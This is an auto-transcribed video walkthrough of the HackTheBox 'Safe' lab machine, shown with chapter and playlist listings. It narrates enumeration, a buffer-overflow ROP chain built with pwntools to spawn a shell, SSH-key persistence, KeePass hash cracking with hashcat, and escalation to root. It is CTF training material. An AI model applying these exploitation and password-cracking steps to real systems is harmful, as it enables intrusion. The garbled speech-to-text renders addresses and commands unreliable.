HackTheBox - Safe
Key Takeaways
The video demonstrates a cybersecurity walkthrough of the HackTheBox 'Safe' challenge, utilizing tools like nmap, GDB, IDA Pro, and John the Ripper to exploit vulnerabilities and gain root access. The challenge involves exploiting a buffer overflow vulnerability, creating a ROP chain, and cracking passwords using John the Ripper and hashcat.
Full Transcript
what's going on YouTube the zipsak and we are going to be doing safe from ACTA box which was labeled as an easy box I think this one's medium because the initial foothold get on the box is exporting the program via a rope chain it is a basic rap chain but nonetheless it is binary exploitation a topic that many people struggle with once you get on the box there is a key pass file along with a few images you have to use either John Tukey pass or key pass to John along with the key pass file and image to create hashes for it and then you can either use John to crack it or hash cat if you use hash cat there is a bug I believe where you can only crack one hash at a time so you just gotta run hash gap multiple times so let's just get into the box and we can see what's going on as always we start off in the hand map so - SC for default scripts as V enumerate versions Oh a output all formats pin the end map directory and call it safe and then the IP address which is ten ten ten 1:47 can take some time to run so I've already ran it looking at the results we have just two ports open the first one being SSH on port 22 and it's banner is telling us that it's a debian box we also have HTTP on port 80 and it's banner is telling us it's debian as well and that it's an apache HTTP d server we do a few and map scripts that ran the important one being the HTTP - title and that's just showing us that it's the default apache web page so we can validate this by just going to 10 10 10 147 and we see yes this is the Apache it works page I'm just gonna quickly go to like robots.txt to see if I see anything there nothing so let's go throw this over into der buster so go Buster - you for URL actually before that specified Durham owed you for URL and then the word list with - W user share word list doorbuster directory list 2.3 medium and then - - o file file we'll just call this root - directory and then let that run well this goes is really not much to do so I'm going to also do a full ports with Ed map with a map - P - I'm also gonna specify the - V flag for four boosts and that's just gonna show us open ports as it does find them and then the IP which is ten ten ten 1:47 well that goes I guess we can go and look at this page if you do a control you to view the source you can see there is indeed something hidden about this page there's a comment that says my app can be downloaded to analyze from here it is running on port 1 3 3 7 so if we let ed map go it will eventually find port 1 3 3 7 but we can just hit this on our own so 10 10 10 147 portly and we just get what do you want me to echo back and it says get slash HTTP slash 1.1 so this is kind of an indicator that we probably should use netcat or telnet because we're making HTTP requests this is the very first thing our browser sends so if we open up a new pane and see 10 10 10 147 port leet and let's do n cat maybe that will be better oh and cats not installed apt install and cat I thought that was always installed let's see it's just weird how NC was handling this line break if we do 10 10 10 147 133 7 we're just getting that we put some stuff here and that outputs this text I'm just curious if n cat is going to handle this any differently and print this test letting us type here and cat 10 10 10 147 of 130 37 nope same behavior so one of that's just a way the program's coded but we put some text here it's gonna say what do you want me to echo back and then output the text and we can't do it multiple times so what I'm going to do is let's say I go back Darla's princey who am i looking for command ejection echoes that back fine let's do back tick who am i back tick does that fine so at this point let's go download the app and it says the app can be downloaded to analyze from here so if we just do my app to download this and then save the file we can go over in terminal and move it out of downloads so move downloads my app put a period for current working directory and then let's open up key draw to analyze this app we could also just execute it and see what happens but I always like opening up and some type of reverse engineering tool first so no project non-shared root HT be safe make the key draw and project name this will be my app finish open this then let's fix the size a little bit there we go import the file my app ok analyze it select all analyzed probably don't need to select all but I'm just lazy and it's a small app so I rather do everything then nothing so let's go over into the functions and then we can go into main to see what this does looking at this decompiled thing I wonder if I can make this bigger properties display C style font here we go 16 there we go so that's probably easier to read so we can see the main function we have a variable right ears to signing 112 bytes and then it's executing system and then passing it user bin uptime as that call so this is why when we do an NC on this port it runs this so on our box if we were on uptime we get the same exact thing so runs uptime via a system call and does it gets and then it puts so just analyzing this I know that this is going to be vulnerable to a buffer overflow but we can test it first because we're only assigning a hundred and twelve bytes here and it gets inputs as just vulnerable functions so if we put in more than one hundred twelve bytes then we'll start overflowing the buffer and then getting over right so if you wanted to test this on your own the standard way to do it is just first make this executable and then run gdb my app and I have Jeff installed if you don't have that go to I think the last video I did Ellingson and I go over installing this but if we just put a bunch of a's actually let's be scientific we can do Python C print a times 112 and then we can put this in and we see it exits normally if we put a times 113 or do 114 it'll probably exit normally because we haven't over wrote enough to actually cause damage to the program and we exit normally let's do a times 128 and then copy this run and now you can see what the seg fault looks like so let's see exactly where we crash in this program we see we're on a return function and return is going to go to our SP so looking at the our SP register we see just all AIDS so in order to see where we actually returned we need to put some type of pattern on this buffer so we can see exactly where in the string so I'm going to run pattern create 128 let's just do 200 no real reason but keep it even so now when we run this we can paste it and then if I look at registers we can see our SP is here if you want to take shortcuts you can just do pattern search then dollar R SP hands leases variables just fine and we can see at offset 120 it found it in little endian format at offset 113 it found in big endian so little endian it says is likely so let's test that one first so we're gonna do is do a times 120 plus b times 8 and then we can do plus c times 8 as well don't have to do the c thing but it's nice to see where stuff goes in afterwards sometimes so that's why i do that so now when we run this program again we can see we still seg faulted but if I run registers and we look at our SP we can see the B's and then the C's so if we put a memory address here then we can continue through execution of the program so I didn't mean to exit we do like let's put the memory address of main so looking at main that's gonna be at 0 0 4 0 1 1 5 F 401 one 5 F so let's do V exploit PI and 0 x4 1 1 5 F and this will be main so I'm just putting that note there because we have to create the burn tool skeletons so from phone import store context terminal is equal to T marks new window and then p4 process is equal to gdb debug my app the main and then context Oh s equals Linux Arc is equal to amd64 okay so now if we do junk is equal to a times 120 and then we put the main on the stack so we'll do call main I guess maybe be 64 0 X 4 1 1 5 F and then P dot we have to do like receive lines and print oh we can just try P dot Sam line junk plus call underscore main and this has to be encoded if I don't it's and string format and call main is and byte format so doing this dot encode turns this from a string into a byte so we can now concatfile dot I three point one hit because we're breaking main so I can just do continue and command aborted see so I'm guessing I have to do a receive line call until we get this so let's copy this variable go back into our code the exploit then have it do a receive until and then that line so now when we run exploit if we do Python 3 exploit PI we hit our first breakpoint which is main we do continue and we get hit by another breakpoint on main so we have verified that a buffer overflow is working so what we want to do now is look at what we can do so going into G draw we want to hijack this system call however we don't know have a way to put something on the stack so if we look at this where is it crap did not mean to click that we can break or is it what does that system call right here 0 X 401 160 so if we go back into our script 0 X 4 1 1 6 e I think I said this will be system I don't know why actually did that let's just execute this and then break 0 X 4 0 1 1 6 e and it's correct and then continue will immediately hit a breakpoint but this will be but it should have been at the call B star 0 X 401 164 0.16 e continue stop man +4 I don't think this is it oh yeah it is so right here's the system call so when we're probably doing right here is loading the first variable into RTI because this is load effective address so and 64-bit land variables are executed as registers and the order is a dir SI r DX r CX r 8 NR 9 so since system is only taking one argument which is use a bit uptime only one arguments going to get loaded so that's why we have it loading it rd i right here so if we do X whoops I'm still in T much mood no there we go x /s for string already I we can't access anything let's go that can access so right here is what we're loading in so after this we should have a variable in our di and if we do registers we can see our di is just 0 X 1 so do one more step and then we do X slash X or di we can see we loaded a string user bin uptime and if we do registers we can see that our di is set to the memory address of where this string is so all we have to do to exploit this now is try to find a way to put our string inside of our DI and if you look through this app we can look at all the other exported functions so this is main what's pink I believe is exported what is blue is imported and imported just means it's coming from Lib C so blue means it's not within this binary itself it's a linked function there is a function called test and we can't even decompile test I don't even know what the source code of this would look like but looking at the assembly let's see can I change this easily registers come on we're size colors properties no probs there so I don't know how to change the size on this my bad anyways the first two things here are just setting up the stack of being at a function we pushed the base pointer to the stack and then copy the RSP the stack pointer into the base pointer this is just things to set it up you can look down here as well into a different function and you see those same two commands so this code actually begins right here we're taking the stack pointer and putting it into our di and then jumping to whatever is in our 13 so the stack pointer generally will contain the output of what things are called because that's going to point to at the very top of the stack so when we go to main let's go here wait main okay right here when we do this : puts the stack will are not stack the RSP value will most likely be whatever we put in here so this gets this local 78 we can hit L here and then change this to be RSP we'll put most likely RSP it's generally not how you name a variable in this pot and so what we're doing so this is going to be appointed to what is going to be an RSP and if we do a rock chain to test to get into this function like we had done to get into main then we will push our SB into our di and then do a jump to our 13 so our 13 we want to be system so if we go back into terminal we can do rapper - - search pop r-13 may put this in quotes there we go so we can see we have a call to pop our 13 here it's going to do two other pops so we'll just put null values in these two and then do a return so we want to copy this address and then here we can just exit and then let's go back into exploit and add the memory value before you lose it on clipboard and this is going to be pop or a 13 pop pop I don't care about the other pumps so that's why I just did that now we have to build the rob chain so the very first thing we have to do is put the string bin SH on the stack so we'll do a variable called bin underscore s H is equal to slash bin slash Sh backslash X 0 0 a null byte which is going to terminate the string and then convert this into byte format this is going to be 8 characters 1 2 3 4 5 6 7 and then this is all one so we want to adjust adjunct to be 112 120 minus 8 is equal to 112 so now that that's going to be there we also have to call will have to call system so this will be whoopsie no this will be yeah system a PLT system probably procedural link table if we go to goodra then go to main voice calling system most likely right here system 0 1 1:160 so zo x 401 1 6e that it that doesn't look right let's see we can exit this let's just do object dump - capital D my app crap - I system okay so this is the one we want 401 0 4 0 I guess we can try for one 160 let's see if that works that's gonna be system it'll probably work change to 4 1 0 okay and this should be P 60 Ford that stands for PAC 64-bit so we'll also need to do the pop ODI function to get something into system so pop RDI is equal to p 64 0 x 4 1 - 0 6 and then we need null p 64 0 at 0 and the final piece is the memory address of test so we can jump to it which we'll call system so if we grab this address that is going to be at 401 1 5 2 so put that there and now we can begin assembling a rope chain I'm just gonna get rid of that call main because we don't need it actually just demonstrating things so junk + bin Sh this is going to have the string been SH on registered as the RSP variable and now we're at 1 120 characters so this is the first memory address over right into our SP so we're going to put this as pop it's not right to be our di this is actually pop our 13 I think four oh one two oh six four one two oh six yeah so this is the pop or a 13 address so later used as jump our 13 treat as our SP I don't know a good way to explain that I'll stop my head but there's that and this we can say this is our SP and Ord I then jump our 13 so our SP to ODI jump our 13 okay so we want to pop our 13 and that's going to take the top value which is going to be the memory address of system and it also does to other pops so we want to do null null and then we want it to return to test so I think that's right so what this going to do is it's going to put been SH into our SP then it's going to put the system variable or a system memory location into our 13 and then it's going to get through the other two pops in that chain and then return to test and test will now execute it hopefully so if we did everything correct there's our work which we probably did it so this is break or main continue and right go man again receive until this this P dot interactive run continue it may not be going interactive because it's doing some weird forking so let's just try it on the live system so let's try P is equal to remote 10 10 10 147 and it was on put fleet so let's run this opening connection and we didn't get anything let's see it's going over the network move that okay remember that weird like netcat issue I was having before when we did like netcat 10 10 10 137 meet 147 and it's not giving me that string I think that's what's happening there so that's why I removed that one line if we just execute the program we get what do you want me to go back right away so that is why I had removed this receive until because I was thinking maybe it just never got it and it works awesome so we do this do host name we are on safe so the one thing I want to test out real quick is well either these system addresses work I'm guessing they should so instead of 400 166 II which was down here we'll do 401 zero for zero so 401 0 for 0 for system or one run this again and it still works so again all you have to do is get to system so now that well on the box we can do seedy dollar to go to home can't let go Who am I my bad just drawn Who am I go into CD home user actually it's going at home see who's on this box if there's anyone else just user so go into user and since I'm in a weird interactive mode I'm trying to get into dot SSH so I can drop in SSH gate again when I'm in this weird shell inside of Pern tools I don't know a good way to get a full tty so I'm now just dropping a SSH key so SSH key Jan - F a file we'll call it safe and then chmod 600 safe dot pub and we will just echo this into authorized underscore keys chmod 600 the safe file this is the private key so Shi safe user at 10 10 10 147 and we get a proper shell so I can exit this and we can figure out what we want to do with this box I see a bunch of JPEGs and 8k dbx which is I believe KeePass database so let's just grab everything and then exit out of the shell make the files CD files and we'll do SCP - I dot dot slash safe this is the private key user at 10-10-10 147 and we want to copy everything to a local directory now that the file copy is done let's just take a look at what these images look like so I do Nautilus dot just so I get a file browser and we can see images look pretty standard we can check exist tool to see if there's information in these and glancing through this looks like all the standard metadata associated with an image so nothing too interesting there we can also then walk the images but I'll just do one cuz I don't think it'll resort and do anything interesting nope they're just standard JPEGs there is that key past database my passwords k DB x so my thought was we have to crack this so I'm gonna do was it key pass to John of locate stir to John locate John to store oh no here it is key pass to John this is what the file is so I'm gonna run this on my pass was dot k DB X and let's do two potential oh we do key pass hashes so that's one and then keep s also has the thing anything to do key files so if we do key pass to John you can do dash K to specify the key file so what I'm actually going to do is go through all the JPEGs and put them as key files so do for I and Oster JPEG do echo I done so all that's two can do is get all the phonemes so key pass - John - K dollar I to do the flower name and then my password k DB x and do enter and we get a list of files a list of hashes now the one thing I want to do is replace my passwords with the filename of the key name because the hash is only this piece but if we just did all this it can be a bit of a pain if we don't track the username of the hash and the username being the key file so I'm going to do said then double quote s slash my passwords with dollar I G double quote and now we see my passwords has been replaced with the key file name so we can just do dollar dollar key pass hashes so now when we take a look at this file we have a list of hashes so which SCP key pass hashes to the Kraken I'm just putting it in the hash cat / hashes directory and the Kraken is just machine I have dedicated cracking you can do it on your host computer just don't do it a vm because VMS are slow so we want to do dot slash hash cat - - example hashes and [ __ ] do Wes keep ass gonna be some weird casing is it 13400 there we go so I didn't find one I didn't oh I suppose do key pass with a Y that's Y but right here we have 13400 it's gonna be key pass and this is what it expects of the hash if you do the user flag you can put something before the hash and a colon to keep track of it so super handy feature dot slash cat - am 13400 - capital o hashes slash I don't even know what I called this probably keep a stashes there we go and then the word list which will be opt word list rocky text and we need the - - user flag because we have stuff before the colon so this is gonna start the crack there's one weird thing with keepass and hash cat right now I don't know if it's a bug on my end or just bug in general and only will crack one at a time I noticed this when I went through the whole list and it only said recovered 0/1 this should be zero slash like five or six how many other lines we have in the ashes so it's only taking the very first line which is going to be whatever ends in C ce7 896 I think that's just key pass with no key file so you'd have to run through this cracking multiple times because hash cat wasn't picking them all up whoops wrong file this is key pass nothing okay spot it correctly so I don't think I remember so ce7 896 is this one so it's only taking the very first one so let's put this at the top because I think it was 0 5 4 7 just doing a little bit of cheating but I would go through each of these let hash cat run and we'll see if this works Oh recovered one so we can see the password is what I think of this challenge if you do - - user now oh not - that's user - that show you can see it's keeping track of the key file so we'll copy what I think of it go back here and we can do app install KP COI this is gonna be the key pass COI and this will let us go into the database my head KeePass installed which I don't think I do no I do not we just be able to use the GUI well let that install and then use it finally done in updating or installing KP CLI so I can do KP CLI - H so we can do KP CLI - k DB my is going to be the files directory KP CLI - s KD be my pastures back k DB x - - ki this is image zero five four seven does that not have image zero five four seven there we go and then an add a master password type it and then do help and we can see what commands we have so this is just a literal like command line system we do LS we can go into my passwords OS there is the root so we can cat show and then the entry number which is going to be zero oil root password and then the password is in highlight so we can probably do let's see so a show that has the entry let's try show - a it's not only explain what those do but there we go nope that's all so what is the other one show - F there we go - F will unhide it so what we can do is now SSH root at ten ten ten 1:47 put in the password and it doesn't let us in but SSH may be configured to only aware to not allow root login SH is often allowed that so let's just ssh back in with a private key user at ten ten ten 1:47 and we can try a su we to switch user put in root password and we are here so we can do WC - sea route text and we see 33 characters which is md5 sum inner line breaks so that is the box hope you guys enjoyed take care and I'll see you all next week
Original Description
00:40 - Begin of nmap
02:31 - Discovering MyApp in the HTML Source
03:30 - Examining MyApp on port 1337
05:30 - Opening myapp up in Ghidra
07:20 - Testing out the buffer overflow
08:40 - Using pattern search to see where we can overwrite RSP
10:15 - Create a PwnTool Skeleton and having it call main instead of crashing
12:30 - Testing calling main (error: need to do recvline to send text)
13:50 - Explaining hijacking the SYSTEM() call
17:11 - Finding a way to put user input into RDI
17:30 - Examining the Test Function which places RSP to RDI
19:50 - Finding a pop r13 as the Test Function jumps to r13
23:30 - Putting the gadget togather for code execution
27:00 - Setting pwntools to exploit the remote host
28:30 - Shell on the box
29:15 - Dropping SSH Key to get a normal shell and copying keepass files
31:40 - Using keepass2john to create hashes to crack
35:00 - Cracking keepass hashes with hashcat
37:50 - Using kpcli to export the root password
39:20 - Using the root password to su to the root user
Watch on YouTube ↗
(saves to browser)
Sign in to unlock AI tutor explanation · ⚡30
Playlist
Uploads from IppSec · IppSec · 0 of 60
← Previous
Next →
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
HHC2016 - Analytics
IppSec
HackTheBox - October
IppSec
HackTheBox - Arctic
IppSec
HackTheBox - Brainfuck
IppSec
HackTheBox - Bank
IppSec
HackTheBox - Joker
IppSec
HackTheBox - Lazy
IppSec
Camp CTF 2015 - Bitterman
IppSec
HackTheBox - Devel
IppSec
Reversing Malicious Office Document (Macro) Emotet(?)
IppSec
HackTheBox - Granny and Grandpa
IppSec
HackTheBox - Pivoting Update: Granny and Grandpa
IppSec
HackTheBox - Optimum
IppSec
HackTheBox - Charon
IppSec
HackTheBox - Sneaky
IppSec
HackTheBox - Holiday
IppSec
HackTheBox - Europa
IppSec
Introduction to tmux
IppSec
HackTheBox - Blocky
IppSec
HackTheBox - Nineveh
IppSec
HackTheBox - Jail
IppSec
HackTheBox - Blue
IppSec
HackTheBox - Calamity
IppSec
HackTheBox - Shrek
IppSec
HackTheBox - Mirai
IppSec
HackTheBox - Shocker
IppSec
HackTheBox - Mantis
IppSec
HackTheBox - Node
IppSec
HackTheBox - Kotarak
IppSec
HackTheBox - Enterprise
IppSec
HackTheBox - Sense
IppSec
HackTheBox - Minion
IppSec
VulnHub - Sokar
IppSec
VulnHub - Pinkys Palace v2
IppSec
HackTheBox - Inception
IppSec
Vulnhub - Trollcave 1.2
IppSec
HackTheBox - Ariekei
IppSec
HackTheBox - Flux Capacitor
IppSec
HackTheBox - Jeeves
IppSec
HackTheBox - Tally
IppSec
HackTheBox - CrimeStoppers
IppSec
HackTheBox - Fulcrum
IppSec
HackTheBox - Chatterbox
IppSec
HackTheBox - Falafel
IppSec
How To Create Empire Modules
IppSec
HackTheBox - Nightmare
IppSec
HackTheBox - Nightmarev2 - Speed Run/Unintended Solutions
IppSec
HackTheBox - Bart
IppSec
HackTheBox - Aragog
IppSec
HackTheBox - Valentine
IppSec
HackTheBox - Silo
IppSec
HackTheBox - Rabbit
IppSec
HackTheBox - Celestial
IppSec
HackTheBox - Stratosphere
IppSec
HackTheBox - Poison
IppSec
HackTheBox - Canape
IppSec
HackTheBox - Olympus
IppSec
HackTheBox - Sunday
IppSec
HackTheBox - Fighter
IppSec
HackTheBox - Bounty
IppSec
More on: Tool Use & Function Calling
View skill →Related AI Lessons
⚡
⚡
⚡
⚡
I found 10 bugs in my own security scanner. Here's what they taught me about false positives.
Dev.to · Zein Saleh
Sudden SSL Error for github pages custom domain website
Reddit r/webdev
Reverse-proof protector
Medium · Cybersecurity
The 7 IAM Misconfigurations We See in Almost Every AWS Account
Dev.to · Shieldly
Chapters (20)
0:40
Begin of nmap
2:31
Discovering MyApp in the HTML Source
3:30
Examining MyApp on port 1337
5:30
Opening myapp up in Ghidra
7:20
Testing out the buffer overflow
8:40
Using pattern search to see where we can overwrite RSP
10:15
Create a PwnTool Skeleton and having it call main instead of crashing
12:30
Testing calling main (error: need to do recvline to send text)
13:50
Explaining hijacking the SYSTEM() call
17:11
Finding a way to put user input into RDI
17:30
Examining the Test Function which places RSP to RDI
19:50
Finding a pop r13 as the Test Function jumps to r13
23:30
Putting the gadget togather for code execution
27:00
Setting pwntools to exploit the remote host
28:30
Shell on the box
29:15
Dropping SSH Key to get a normal shell and copying keepass files
31:40
Using keepass2john to create hashes to crack
35:00
Cracking keepass hashes with hashcat
37:50
Using kpcli to export the root password
39:20
Using the root password to su to the root user
🎓
Tutor Explanation
DeepCamp AI